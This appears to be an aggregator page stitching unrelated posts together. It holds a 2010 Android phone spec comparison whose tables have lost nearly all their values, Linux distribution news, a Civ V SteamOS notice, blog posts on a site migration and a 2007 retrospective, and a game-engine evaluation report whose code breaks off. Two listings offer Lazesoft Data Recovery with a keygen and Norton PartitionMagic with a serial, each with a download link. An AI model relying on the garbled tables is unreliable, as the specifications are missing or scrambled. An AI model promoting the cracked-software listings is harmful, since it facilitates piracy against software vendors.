The Xperia X10 has the largest battery – and, might I add, likely the best quality battery of the lot. It's the same battery used in the Xperia X1, where it performed admirably. Talk time for the Nexus One is very good, and we expect the Xperia X10 to match it or be marginally better. Of concern is the Nexus One's 3G stand-by time of 250 hours. It's worse than the other phones, but not bad at a little over 10 days! Updated 21st Jan 2010 – confirmed Xperia battery times: the Xperia performs at more or less the same level as the other Android phones, delivering 5 hours of talk time.

Sony 1500 mAh Battery

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone


1400 Li-Po

1400 Li-Po

1500 Li-Po

1350 Li-Po

Talk/Standby 3G







The phones are all capable of 3.5G (HSDPA 7.2 Mbit/s) data transfer. The Motorola Droid and Sony Xperia X10 give you a little bit extra, supporting 10.2 Mbit/s. Obviously your network must support these speeds. The Motorola is the only one with Class 12 EDGE, but this is not too important in this day and age of 3G.

Nexus One, Bravo

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

HSDPA (Mbit/s)

7.2 (1700 band)





2.0 - 5.76





(850, 900,1800,1900)






Class 10

Class 12

Class 10

Class 10

UMTS band 1/4/8

















The Nexus One is the only Android phone that currently offers 802.11n connectivity. In fact, I can't think of any other phone out there with 802.11n. This might be the Google Talk phone we all thought was heading our way after all! All the phones have either Bluetooth 2.0 or 2.1. These are essentially the same as far as data transfer (3 Mbit/s) is concerned, though version 2.1 offers better power efficiency and a few other enhancements.

Nexus One - Broadcom 802.11n

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone


2.1 + EDR

2.1 + EDR

2.1 + EDR

2.0 + EDR


802.11 b






802.11 g






802.11 n







The 2GB micro-SD card shipped with the Acer Liquid is unrealistic by today's standards. The Motorola Droid offers the best deal with a 16GB micro-SD. The Sony Xperia X10 ships with an 8GB micro-SD card, but remember the Xperia X10 also has that slightly bigger 1GB of on-board flash memory, for an impressive total of 9GB, expandable to a total of 33GB. Google decided to save on costs by only offering a 4GB micro-SD card with the Nexus One, but if the idea is to compete against the iPhone then 8GB should be the minimum. Clearly Motorola is on the right track with 16GB shipped, and you can't ignore the impressive 1GB ROM on the Xperia X10.

SanDisk working on 128GB Micro-SD

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Sim Card






3.5 mm jack






Micro USB





Shipped Micro SD/Supported (GB)


Class 2


Class 6




Class 2


Light Sensor





Proximity Sensor















Cell/Wifi Positioning






Case Material

The Motorola's metal case is the sturdiest. Build quality on the Nexus One and Xperia X10 is very good. The Xperia X10 has reflective plastic, whilst the Nexus One is more industrial, with teflon and metal on the bottom. The Acer Liquid has average build quality, but that was always the intention with the Liquid, in order to keep manufacturing costs low.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone






If you want a physical keyboard then the Droid is your only choice in this list. The keys on the Droid keyboard are basically flush, so you don't get the comfortable key-separation feel of a BlackBerry keyboard. All the phones (the Droid included) have virtual keyboards which work in portrait or landscape mode.

Droid Slide-out keyboard

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone







The Xperia X10 is one of the best camera phones. Sony used its camera know-how for its new smartphone lineup, and it will be hard to match up against Sony unless the other players partner with someone like Canon. The X10 comes with an 8.1 MP camera with 16x digital zoom. The software has also been changed from standard Android to include typical camera options. Also included is a face detection feature that recognizes up to four faces in a photo and appropriately tags/files it. The Motorola Droid comes in with a 5 MP camera with 4x digital zoom, compared to the 5 MP and 2x digital zoom on the Nexus One.

Xperia X10 sample photo

***Additional Photos***

Motorola Droid sample photo

Nexus One sample photo

Acer Liquid sample photo

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone







X 2

X 4





Y (dual)




Video-wise, the Nexus One, Motorola Droid and Xperia will perform roughly the same.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Video Res.











Lightest and thinnest is the Nexus One. The Motorola is weighed down by the metal used. They are all roughly the same size as the iPhone 3GS, which comes in at 115.5 x 62.1 x 12.3 mm and weighs 135 g.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Height (mm)





Width (mm)





Depth (mm)






Weight (g)






OS Level

The Nexus One has the most current OS level at 2.1. The Motorola Droid is expected to upgrade soon, as is the Acer Liquid. The heavily customized Xperia X10 will be more of a challenge to upgrade to 2.1.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone






The Xperia X10 shines when it comes to demonstrating how customizable Android really is. The other three phones make very few changes to the standard Android OS.

Sony TimeScape/MediaScape

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone



Rachael UI

Acer UI 3.0

Application Market

We are likely to see more app markets emerge. Sony currently leads the way, and Motorola and HTC (Nexus One) will follow suit.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Android Market

Android Market

PlayNow, Android Market

Android Market


Mediascape is an ambitious effort to add decent media functionality to Android. Sony succeeds, and also introduces a fun way to organize your media. Acer has Spinlet, which is not as complex as Mediascape.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone





Social Networking

Sony again leads the customization way with Timescape. This is another good job by Sony, adding extra functionality to Android. Timescape helps you manage your contacts better and brings social networking and contacts into one application.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone





          Google vs. Apple        

The Android vs. iPhone battle is the reincarnation of a fight we witnessed decades ago. It's a battle Apple once lost.

Google has therefore decided to steal a page from a small startup called Microsoft and its Windows OS, by offering Android on multiple hardware platforms – compared to Apple, which is doing what it has always done since the early 80's: proprietary. Why won't Apple learn? Well – because they still make money.

The advantage Google has over Apple, much like in the PC world, is that there are companies that make cheap handsets and sell them – cheap. This obviously reduces Google's risk, since they don't need to sell any hardware. It is analogous to the relationship between Dell, HP etc. and Microsoft (back then Linux was not available). These companies put the Android OS on their hardware because it's cheap (free), and that increases Google's market share.

Then you get the higher-end phones – some surpassing Apple's hardware. Apple can't match the might of a collective market: Sony, Acer, Dell, HTC, Motorola, Samsung, LG, etc.

Apple will be bigger (by turnover) than any single one of the hardware manufacturers, but combined they will account for more than 50% of handsets on the market in 2-3 years' time.

Just like Microsoft, Google will have the leading OS for handsets. If hardware manufacturers just come up with a way to upgrade hardware – e.g. RAM, SD cards (doable!), CPU, battery (doable!) – then it's the Microsoft+PC vs Apple+Mac battle all over again. We all know Microsoft won that one.

Let's not forget the direction Google has hinted it wants to take for the Market Place payment system: all apps bought will be charged through the carrier. It couldn't be any easier!


I think the Sony Xperia X10 is the Android phone to beat. Its iPhone competitor will be the 4G. The Sony Rachael UI (UX) is very impressive. The downside is that the phone runs Android 1.6, which only supports 65K colors, unlike Android 2.x, which supports 16 million. The UI is tightly woven into Android 1.6 – could this be a problem when it comes to updating the OS?


1) 8.1MP with 16x digital zoom
2) Face recognition (automatically recognizes up to 5 faces in a photo)
3) Smile detection (takes the picture when you smile)
4) + all the usual stuff like video calling, geo-tagging, camera/video flash etc.

1 GHz Snapdragon

1 GB internal memory - 384MB RAM

4.0 inch capacitive (480 x 854 - WVGA)



1) Sony PlayNow - Music/Video/Game/Applications downloads
2) Sony TimeScape - Social Networking/Communication

3) Sony MediaScape - Media Player

4) Sony PS3 Remote Play (In development)


1) Layer

2) Speed Forge 3D


100+ Sony Accessories


HTC Bravo, Nexus One, Motorola Shadow (Rumoured) - AMOLED Touch screen, multi-mics, 5MP camera, 720p Video recording, HDMI port, 802.11 b/g/n

Nexus One:


iPhone 4G (June 2010) - 5MP, AMOLED, Video Calling, 802.11 b/g/n

Concept 4G:

          Dell has sold tens of millions of dollars' worth of Linux laptops        


In a video interview, Barton George, one of Dell's engineers, said the company has sold tens of millions of dollars' worth of laptops shipping with Ubuntu preinstalled.
He went on to say that the initial investment was only $40,000, and within four years sales reached tens of millions of dollars.
When asked why they don't preinstall Red Hat or openSUSE by default, he said the company does not want to spread its efforts thin, and that their driver work is sent upstream and will therefore reach those distributions eventually.
Dell's developer-focused machines have grown from a single laptop into a product line with enough variety to suit most developers' needs.
You can check out Dell's developer product line here.

Fahad, Thursday 2017/01/19 - 9:28 AM

          Linux Mint 18 KDE finally released        


After a two-month delay, Linux Mint 18 KDE has been released. It is a long-term support release that will be supported until 2021. Most notably, it ships a stable release of the KDE Plasma 5.6 desktop, the first of the KDE 5 line in Mint.

This release comes with all the core Linux Mint 18 features: it ships the Thermald daemon to monitor temperature sensors and protect the machine from overheating, supports the exFAT file system out of the box, and brings back Btrfs file system support. The release is built primarily on the Ubuntu 16.04 package base.
System requirements: 2 GB of RAM and 10 GB of disk space.
You can download this release here.

Fahad, Friday 2016/09/09 - 11:35 PM

          Linux Mint 18 released        


The developers of the popular Linux Mint distribution have finally released Linux Mint 18. It is a long-term support release that will be supported until 2021. The headline change is the unification of applications across Mint's GTK+-based editions, MATE and Cinnamon.

These applications are called X-Apps, and their main goal is to replace the GNOME applications that only work on the GNOME 3 platform with applications that run on all GTK desktops, so that everyone benefits.
The main features of the X-Apps:
1. They are built on modern, actively developed libraries: GTK3 and gsettings.
2. They use traditional user interfaces (menus and toolbars), unlike the new GNOME 3 applications.
3. They run everywhere: they are not tied to a particular desktop or distribution.
The X-Apps so far include: Xed, a text editor; Xviewer, an image viewer; Xreader, a PDF document reader; Xplayer, a multimedia player; and Pix, a photo manager and organizer.
It is worth noting that these applications were not developed from scratch; they build on the GNOME applications. The core GNOME applications also remain available in the repositories for anyone who wants them.

Screenshots of the X-Apps

Among the new additions in Mint 18 is the Mint-Y theme, the successor to the Mint-X theme launched in 2010. Six years on, with much changed in the world of desktop themes, the development team decided to build a new theme: Mint-Y, based on the popular Arc theme and the Moka icons. It gives you a modern, clean, professional look, in the words of the Linux Mint developers.

To learn about the new Cinnamon desktop's features, watch this video covering most of them.

You can download Linux Mint 18 here.

Fahad, Thursday 2016/06/30 - 11:48 PM

          Ubuntu 16.04 released        

Canonical has finally announced the release of the sixth long-term support version of its Ubuntu operating system. Ubuntu 16.04 comes with many new features, most of them focused on server technologies, cloud computing and the Internet of Things.

The most important features of this release:
- A new format for distributing software, snap, which is secure and robust.
- ZFS file system support, a very advanced technology for managing and recovering files; you can learn more about it in this article.
- LXD added as a pure container hypervisor for OpenStack Mitaka.
- Support for IBM Z and LinuxONE systems from IBM.

On the desktop side there are no radical changes; the most notable new features:
- The Ubuntu Software Center has been dropped in favor of GNOME Software.
- The Unity launcher can now be moved to the bottom of the screen.
- Improved support for HiDPI displays.

As for software versions, this release as usual ships the latest stable applications, most notably:
- Linux kernel 4.4
- Python 3.5
- LibreOffice 5.1
- GNOME applications 3.18

Ubuntu 16.04 flavors

The official Ubuntu flavors have also been released: Ubuntu MATE, Kubuntu, Xubuntu and Lubuntu. The differences are usually just the desktop environment used in place of Unity.


As usual for long-term support releases, the highlight is five years of free official support from Canonical from the distribution's release date. That makes this the recommended release for the next two years, until 18.04 arrives.

Download Ubuntu 16.04

Ubuntu comes in several editions: one for the desktop, another for servers, another for cloud computing, and the last for developers. You can pick the edition that suits you, and the architecture that suits your machine, by visiting the official website.

Fahad, Saturday 2016/04/23 - 2:44 PM

          Introducing Sid Meier’s Civilization V for SteamOS        
Aspyr Media is pleased to announce our first Linux and SteamOS title, Sid Meier’s Civilization V. The SteamOS release includes all Civilization V DLC and expansion content, including Gods & Kings and Brave New World.

This release targets SteamOS on current gen hardware. Additionally, we're working towards supporting Ubuntu 14.04 as well as additional video cards in future updates.

Here’s where we need your help! To improve Civ V and future AAA games on SteamOS, we're looking for feedback. Tell us below what's working great or what's not working. If you're having any problems, please contact our support directly at http://support.aspyr.com/tickets/new
          Lazesoft Data Recovery Unlimited Edition 3.4 + Keygen        
Lazesoft Data Recovery Unlimited Edition
Lazesoft Data Recovery Unlimited Edition 3.4 + Keygen | 112 MB

Lazesoft Data Recovery offers home users and businesses a complete solution for recovering files that were deleted, or lost due to the formatting or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or software failure.

With an easy-to-use interface and a powerful data recovery engine, Lazesoft Data Recovery lets you recover data yourself and preview recovered files while the search is in progress.

Easy recovery in all major data loss cases.
Files accidentally deleted or emptied from the recycle bin
Formatted media/disk drive/partitions/dynamic volumes
Logically crashed disk
Data deleted using Shift+Del keys
Files corrupted due to virus attacks
Software crash
Power faults
Partitions with corrupt file systems, etc.
Recover files even when your computer cannot boot up and cannot enter Windows.

Recover Data When Windows Cannot Boot up normally!
When a disk or Windows itself has crashed badly, you might not be able to boot your computer and enter Windows. Lazesoft Data Recovery can burn a bootable data recovery CD/USB that lets you boot the computer and rescue your data.
Boots various brands of desktops and laptops: Dell, ThinkPad, HP, Sony, Toshiba, Acer, Samsung, etc.
With WinPE-based and Linux-based bootable disk builders, Lazesoft Recovery Suite has excellent hardware compatibility.
Boot the computer from CD or USB disk.
User-friendly Boot Media Builder interface

Download Link
          Norton PartitionMagic 8.05 Build 1371 (Boot CD) + Serial        
Norton PartitionMagic 8.05
Norton PartitionMagic 8.05 Build 1371 (Boot CD) + Serial | 276.14 MB

Norton PartitionMagic lets you easily organize your hard drive by creating, resizing, copying, and merging disk partitions. Separate your operating system, applications, documents, music, photos, games, and backup files to reduce the risk of data loss if your system crashes. You can use Norton PartitionMagic 8.0 to run multiple operating systems safely.

Features :
  1. Divides a single hard drive into two or more partitions
  2. Lets you safely run multiple operating systems on the same PC
  3. BootMagic makes it easy to switch between different operating systems
  4. Allows you to copy, move, resize, split, or merge partitions as needed - without losing any data
  5. How-to wizards guide you step by step through the partitioning process
  6. Intuitive Windows-based browser lets you find, copy and paste files in both Windows and Linux partitions
  7. Allows you to create and modify partitions up to 300 GB
  8. Supports USB 2.0, USB 1.1, and FireWire® external drives
  9. Supports FAT, FAT32, NTFS, Ext2, and Ext3 file systems
  10. Converts partitions among FAT, FAT32, and NTFS without losing data
  11. Allows you to enlarge an NTFS partition without restarting your computer
  12. Resizes NTFS system clusters to the most effective size
Download Link

          Migration (almost) complete        

This weekend has seen a complete migration of An Architect's View from a very old version of BlogCFC (3.5.2) with a custom Fusebox 4.1 skin to the latest Mango Blog (1.4.3), as well as a complete migration of all of the content of the non-blog portion of corfield.org (my personal stuff, my C++ stuff and a bunch of stuff about CFML, Fusebox and Mach-II) from Fusebox to FW/1. I've moved from a VPS at HostMySite to an "enterprise cloud server" at EdgeWebHosting, and I think it's all gone pretty smoothly, although it's been a lot of work.

Hopefully I haven't broken too many URLs - I spent quite a bit of time working on Apache RewriteRules to try to make sure old URLs still work - but it has given me the opportunity to streamline a lot of the files on the site (can you imagine how much cruft can build up in eight years of running a site?).
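For anyone attempting a similar migration, the RewriteRules involved look roughly like this (a hypothetical sketch only — the actual rules and URL patterns used on corfield.org are not shown here, and `entry-redirect.cfm` is an invented name):

```apache
# Map old BlogCFC entry URLs onto the new blog's URL scheme.
# Patterns are illustrative, not the real rules used on the site.
RewriteEngine On

# e.g. /blog/index.cfm?mode=entry&entry=ABC123 -> redirect handler
RewriteCond %{QUERY_STRING} ^mode=entry&entry=([A-F0-9-]+)$ [NC]
RewriteRule ^blog/index\.cfm$ /blog/entry-redirect.cfm?id=%1 [R=301,L]

# Old static Fusebox pages -> new FW/1 routes
RewriteRule ^articles/(.*)\.cfm$ /main/article/$1 [R=301,L]
```

The key detail is that mod_rewrite's `RewriteRule` pattern never sees the query string, so old `?mode=entry` URLs have to be matched with a `RewriteCond` on `%{QUERY_STRING}` and carried over via the `%1` backreference.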

What's left? Just the "recommended reading" bookstore portion of my old site. I store the book details in an XML file and process them in a CFC as part of the old Fusebox app (converted from Mach-II before that and from PHP before that). It's late and I can't face it tonight. Then I need to build out a Mango skin that looks like my old site (and eventually re-skin the non-blog portion of the site).

The underpinnings of the site are Apache, Railo ( at the time of writing), Tomcat (6.0.26 at the time of writing), Red Hat Linux, MySQL. I still have some fine-tuning to do but this is pretty much an out-of-the-box WAR-based install of Railo on Tomcat for this one site on the server. Over time I'll probably build out a home for FW/1 here under another domain, with examples and more documentation than is currently maintained on the RIAForge wiki. That's the plan anyway.

If you find any broken links, let me know (the Contact Me! link is in the right hand column, near the bottom).

          2007 in Retrospect        

As I did in 2006, here's my review of 2007. For some strange reason, I decided to make some New Year Resolutions in 2006. How did I do? I said I'd do more unit testing - and I did, but there's always room for more unit testing. I said I'd do more open source. Well, I released Fusebox 5.1 and Fusebox 5.5 as well as my Scripting project and a cfcUnit facade for CFEclipse so I think I did alright there. I also said I'd do more Flex and write some Apollo (now AIR) applications. I didn't do so well on those two! I think I'll revert to my usual practice of not making resolutions this year...

2007 was certainly a year of great change for me, leaving Adobe in April (a hot thread with 62 comments!) to become a freelance consultant, focusing on ColdFusion and application architecture. I also worked part-time on a startup through the Summer but consulting has been my main focus and continues to be my total business as we move into 2008.

2007 also saw me getting much more involved with the ColdFusion community, rejoining all the mailing lists that I hadn't had time to read with my role at Adobe, becoming an Adobe Community Expert for ColdFusion and then taking over as manager of the Bay Area ColdFusion User Group.

I also got to speak at a lot of conferences in 2007:

I also attended the Adobe Community Summit which was excellent!

ColdFusion frameworks were also very busy in 2007:

Adobe was extremely busy too:

  • Apollo (AIR) hit labs in March
  • The Scorpio prerelease tour (Ben came to BACFUG in April) with the ColdFusion 8 Public Beta in May and the full release in July
  • Creative Suite 3
  • Flex began its journey to open source
  • The Flex 3 and AIR Beta releases
  • Adobe Share

I had a number of rants:

Other good stuff from 2007:

          Examining Linux kernel crashes with kdump        

kdump is a way to capture a crash dump of the Linux kernel, but documentation explaining its usage and internals can be a little hard to find. In this article I look at the basics of using kdump, and at how kdump/kexec are implemented in the kernel.

"Examining Linux kernel crashes with kdump" was first published at 伯乐在线.

          20 Linux commands every system administrator should know        


"20 Linux commands every system administrator should know" was first published at 伯乐在线.

          how I enjoy tinkering with the PC        
Among the things I keep my brain busy with so as not to think about myself, politics occupies a prominent position. But given the latest heavy disappointments, and the impression that for a few years it's better to let it go, politics is ceding first place to another occupation: computing, or rather, , indeed, !
If only because he (she?) fills me with satisfaction.

The other day (Monday) the card arrived, as expected. Then a pause to wait for my trusted computer guy, since I didn't much trust my own abilities (in the meantime I studied up on how to remove and refit every component of the PC, plugs inserted, eyes closed, in under a minute).
Work (all on my own) to:
  • prepare (remove the old ATI drivers)
  • extract the old card
  • insert the new card
  • swear a lot while freeing up a Molex power cable, using a knife, a cutter and a screwdriver to lift a plastic cable tie without sawing through the cables underneath
in short... an ordeal.
Then I reboot the PC, Ubuntu starts, resolution at 800x600, oh well. I install the Nvidia drivers using Envy; everything goes well, but the resolution stays at 800x600.
Here my trusted computer guy steps in, and I rope him into reconfiguring Xorg.
In the end everything works, but not .
Oh no! I bought myself the fancy video card, I want Compiz!
In two hours I messed the system up so badly that by the time I shut it down I knew the only way out was to format and reinstall everything from scratch, taking the opportunity to move to the new version, 8.04.

The following morning I install the drivers for Windows (and remember why I stopped using it); I really should format and reinstall everything over there too.
So I reinstall Ubuntu from the CD, and install the .
What can I say?
It runs like a dream.
          failed computer technician        
The idea was to solve my problems with Linux and give the PC a good dose of extra power; to that end, a new video card should arrive tomorrow: a Point of View 7600 GT, in the AGP version of course (I sweated, but in the end I found it).
(solving the Linux problems = switching to Nvidia and its drivers, leaving ATI to its own problems)

A brilliant idea: I had searched carefully and checked everything I thought needed checking. And yet I got my sums completely wrong...

While waiting for the new arrival, I thought it wise to clean the case (which I imagined was packed with dust). I opened it, wiped the outer surfaces with a cloth, and dusted and picked over the inner surfaces as best I could; by the end I must have removed a kilo of dust...
On opening it (for the first time, since earlier it was under warranty and after that I had neither good reason nor any desire to fiddle with it) I noticed that:

the people who assembled it at FRAEL did a masterful job: the cables are packed away beautifully, leaving ample space in the case; they even added a fan I didn't think was included, guaranteeing excellent air circulation (which the dust had managed to halve); and since there were two "free" USB headers, they even mounted four extra USB ports on the back (of which only two work, naturally). A fair question: what the hell am I going to do with 8 USB ports? Oh well.

In the end, closing it back up after all that painstaking work, I did a couple of calculations and pictured the disasters in store for tomorrow...

The power supply surely won't handle the video card / the video card will demand twice the voltage my motherboard supports (I didn't know this one, but I've just read it in the motherboard's little manual). I can already see myself buying a new power supply, unplugging all those admirably folded and packed cables, and desperately refitting the new ones with no memory of where they went...
Or selling the new video card on eBay... :(
What a pain... a guy can't even buy a video card...

Up until these discoveries, hardware seemed like a fascinating subject to me
          my Ubuntu        
After a couple of weeks of continuous use I can finally say it: how much I like !
Since I started using it I haven't booted Winzozz XP again, except a couple of times to compare.

All roses and flowers? No, certainly not; my video card has lousy drivers that lock up X (at least I think that's the problem), so I've had to disable all those pretty 3D effects you show off with, and it still tends to get very slow in certain situations (though I do stress it).

Still, I have all the programs I need:
  • Firefox
  • Thunderbird
  • Pidgin
  • Rhythmbox (a very nice discovery)
  • OpenOffice
  • ...and a raft of programs for doing just about everything, all invariably Free.

The thought that all this software, with all the work behind it, is free – more than free, even – makes my head spin, and gives me a certain sense of guilt:
what do I give back?
Sooner or later I'll try my hand at translations, perhaps, which seem to me the only way to contribute without doing terrible damage :-)

Pros compared to Winzozz XP?
I didn't pay anything for it, while dear old Winzozz cost a full 128 euros including VAT; that doesn't seem like a minor detail to me!
Another pro?
The graphical interface: simple, customizable, and far more usable and comfortable than the Winzozz one (which is decidedly dated...).
Another pro is transparency: I have no use for the source code of the software I've installed, but knowing there's a community of developers checking "how" a piece of software is made and what it does puts me very much at ease; with Winzozz there were plenty of strange behaviors outside my control, not to mention that nobody could know what the software was "really" doing... and why did it want to check every three months whether my copy was genuine?...
One more pro? Package management for installing and updating software: it's light-years ahead of the Winzozz system (which amounts to: "do whatever the hell you want"); on Ubuntu you just go to
"Applications -> Add/Remove..."
and a beautiful library appears with a sea of software to choose from, browsable by category, type and so on. Once you've read the descriptions and selected what you need (and deselected what you don't need or already have on your PC), you just click OK and it does everything. Meanwhile you carry on working, knowing you'll hardly ever need to reboot after the installation.
The real pro, for me, is political all the same: the possibility of a market offering quality products that are free and over which you have full control; and I think above all of what a third-world country can (or could) do thanks to Free software...

All in all, hoping that the driver problem with the damned ATI cards gets solved once and for all (ATI's fault, I want to be clear), and hoping that the software market in Europe gets liberalized (have you signed the petition yet? I wrote about it months ago too), I've now managed to make the switch to Linux, and I hope I won't be forced to retreat.
The goal of making myself independent of Winzozz before being forced to move to Vista has been reached; now I'll have to start proselytizing :-)

Tag: , , , ,
          By: ranjeet kumar        
What a mistake – the Linux YouTube videos are not downloading!







          An MDB file viewer for Linux        

A few years ago I wrote a post on how to convert an MDB file to ODB, but unfortunately it no longer works with the latest version of LibreOffice. Luckily, there is a piece of software for GNU/Linux called mdbtools, which contains a set of utilities for querying MDB (Microsoft Access) databases, as well as exporting them to CSV. The […]
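As a minimal sketch of that workflow (assuming mdbtools is installed; the database, table and column names here are invented for illustration): `mdb-export database.mdb TableName` writes the table to stdout as plain CSV, which is then trivial to post-process, for example in Python:

```python
import csv
import io

# CSV as produced by: mdb-export database.mdb Clients
# (captured here as a literal string so the example is self-contained)
mdb_export_output = 'id,name,city\n1,"Ada","London"\n2,"Grace","New York"\n'

# csv.DictReader turns each row into a dict keyed by the header line.
rows = list(csv.DictReader(io.StringIO(mdb_export_output)))

print(rows[0]["name"])  # Ada
print(len(rows))        # 2
```

In practice you would capture the real `mdb-export` output with `subprocess.run` or a shell pipe instead of a literal string.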

The article "Visor de archivos MDB en Linux" belongs to the blog The Power of Mind.

          Conversor de Access a OpenOffice.org        

On occasion you may need to recover information from a database you created years ago with MS Access, but of course you now use GNU/Linux and no longer have that proprietary abomination. Don't panic: looking for a solution, I found that the Junta de Extremadura has developed a script to convert our data base […]

The article "Conversor de Access a OpenOffice.org" belongs to the blog The Power of Mind.

          ASP.NET Hosting Comparison – ASPHostPortal vs Arvixe        
 With tons of companies in the ASP.NET hosting industry, it is very difficult to choose the best one. Both ASPHostPortal and Arvixe are well-known names. ASPHostPortal is famous for its ASP.NET hosting services, while Arvixe made its name mainly through its range of web hosting services, including both Windows hosting and Linux hosting. Both aim…
          Ephenation evaluation report        

Vision of Ephenation

To have a game like World of Warcraft, where players are able to add their own adventures. I think this is a probable future development. This type of game should be fully realized and generally available in something like 10 to 20 years.


Unlimited world

The size of the world should not be limited. It is easier to implement a flat world than a spherical one, and a flat world can be unlimited. The natural world will obviously have to be generated automatically.

Unlimited players

This is not possible, of course, but the number of simultaneous players should be big. A limit of 10 or 100 is much too small, as everyone would more or less know everyone and work on the same project. A minimum would be 1,000 players, but preferably more than 10,000. That will lead to a situation where you always meet new players you don't know, and the world is big enough that you can always find somewhere you have not yet explored.

Unlimited levels

Most RPG-type games have a limited set of levels. But that puts a limit on the game play. After reaching the top level, the game is no longer the same. Not only that, but there is a kind of race to reach this top level. Instead, there shall be no final top level. That will put an emphasis on constant exploration and progress.

Allocate territory

Players should be able to allocate a territory, where they can design their own adventures. This territory shall be protected from others, making sure no one else can interfere with the design.

Social support

Community and social interaction are very important. That is one reason for the requirement to support many players, as it will allow you to include all your friends. There are a couple of ways to encourage community:
  1. Use of guilds. This would be a larger group of players, where you know the others.
  2. Temporary teams, used when exploring. It is more fun to explore with others.
  3. Use of common territories. It shall be possible to cooperate with friends to make territories that are related and possibly adjacent to each other.


It shall be possible to design interesting buildings, landscapes and adventures. The adventures shall be advanced enough so as to support triggered actions, with dynamic behavior that depends on player choices.


This is a description of how the project was executed. It was started at the end of 2010. Most of the programming was done by me (Lars Pensjö), but I got support with several sub-modules.


It was decided to use Go as the programming language for the server. Go has just the right support for this type of software:
  1. High performance (compiled language)
  2. Object orientation and static typing
  3. The concept of goroutines (a lightweight version of threads)
  4. A very high quotient of "it works when it compiles"
  5. Garbage collection
The disadvantage of Go when the Ephenation project was started was that Go was a new language in transition, with an uncertain future. This turned out not to be a problem, and the language today has a frozen specification (Go 1).

To be able to manage the massive number of players, quadtrees are used for both players and monsters.
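The server itself is written in Go; purely as an illustration of the idea (a Rust sketch with hypothetical names and capacity, not the project's actual code), a quadtree lets "who is near this position?" queries skip most entities instead of scanning all of them:

```rust
// Illustrative quadtree sketch: points subdivide into four children once a
// node exceeds CAPACITY, and range queries prune whole subtrees.

#[derive(Clone, Copy)]
struct Point { x: f32, y: f32 }

const CAPACITY: usize = 4; // assumed node capacity for this sketch

struct QuadTree {
    min: Point,                          // axis-aligned bounds: [min, max)
    max: Point,
    points: Vec<Point>,
    children: Option<Box<[QuadTree; 4]>>,
}

impl QuadTree {
    fn new(min: Point, max: Point) -> Self {
        QuadTree { min, max, points: Vec::new(), children: None }
    }

    fn contains(&self, p: Point) -> bool {
        p.x >= self.min.x && p.x < self.max.x && p.y >= self.min.y && p.y < self.max.y
    }

    fn insert(&mut self, p: Point) {
        if !self.contains(p) { return; }
        if self.children.is_none() && self.points.len() < CAPACITY {
            self.points.push(p);
            return;
        }
        if self.children.is_none() { self.subdivide(); }
        for child in self.children.as_mut().unwrap().iter_mut() {
            child.insert(p); // only the child whose bounds contain p keeps it
        }
    }

    fn subdivide(&mut self) {
        let mid = Point { x: (self.min.x + self.max.x) / 2.0,
                          y: (self.min.y + self.max.y) / 2.0 };
        self.children = Some(Box::new([
            QuadTree::new(self.min, mid),
            QuadTree::new(Point { x: mid.x, y: self.min.y }, Point { x: self.max.x, y: mid.y }),
            QuadTree::new(Point { x: self.min.x, y: mid.y }, Point { x: mid.x, y: self.max.y }),
            QuadTree::new(mid, self.max),
        ]));
        // Push the existing points down into the new children.
        for p in std::mem::take(&mut self.points) {
            for child in self.children.as_mut().unwrap().iter_mut() {
                child.insert(p);
            }
        }
    }

    // Collect all points within `radius` of `center`.
    fn query(&self, center: Point, radius: f32, out: &mut Vec<Point>) {
        // Prune: skip this node if the circle cannot intersect its bounds.
        let cx = center.x.clamp(self.min.x, self.max.x);
        let cy = center.y.clamp(self.min.y, self.max.y);
        let (dx, dy) = (center.x - cx, center.y - cy);
        if dx * dx + dy * dy > radius * radius { return; }

        for p in &self.points {
            let (dx, dy) = (p.x - center.x, p.y - center.y);
            if dx * dx + dy * dy <= radius * radius { out.push(*p); }
        }
        if let Some(children) = &self.children {
            for child in children.iter() { child.query(center, radius, out); }
        }
    }
}

fn main() {
    let mut tree = QuadTree::new(Point { x: 0.0, y: 0.0 }, Point { x: 100.0, y: 100.0 });
    for i in 0..10 {
        tree.insert(Point { x: i as f32 * 10.0, y: i as f32 * 10.0 });
    }
    let mut near = Vec::new();
    tree.query(Point { x: 0.0, y: 0.0 }, 15.0, &mut near);
    println!("{}", near.len()); // only (0,0) and (10,10) are within 15 units
}
```

The pruning step in `query` is the whole point: nearby-player lookups touch only the nodes whose bounds overlap the search circle.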

It is the server that has full control over all model data: player attributes, melee mechanics, movements, etc.


The client was initially designed in C, but I soon switched to C++. There are still some remains from C, which explains some not-so-good OO solutions. OpenGL was selected, instead of DirectX, partly as a random choice, but also because I wanted to do the development in Linux.

It was decided to use OpenGL 3.3 instead of supporting older variants. There are some nice improvements in OpenGL 3.3 that make the design easier, which was deemed more important than supporting old hardware.

The world consists of blocks, voxels. This is difficult to draw in real time at a high FPS, as the number of faces grows very quickly with viewing distance. Considerable effort was spent on transforming the list of cubes into a list of visible triangles. It is also difficult to make a level-of-detail (LOD) algorithm that gradually reduces detail at long distances.
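The core of that cube-to-triangle reduction is that a face only needs triangles when its neighboring voxel is empty. The client is actually C++; this Rust sketch (with an assumed 16-voxel chunk size and hypothetical names) only illustrates the counting:

```rust
// Illustrative sketch: count the cube faces of a voxel chunk that are exposed
// to air, i.e. the only faces that need to be turned into triangles.

const N: usize = 16; // assumed chunk edge length for this sketch

struct Chunk {
    blocks: [[[bool; N]; N]; N], // true = solid voxel
}

impl Chunk {
    fn solid(&self, x: i32, y: i32, z: i32) -> bool {
        if x < 0 || y < 0 || z < 0 || x >= N as i32 || y >= N as i32 || z >= N as i32 {
            return false; // treat out-of-chunk as empty, for simplicity
        }
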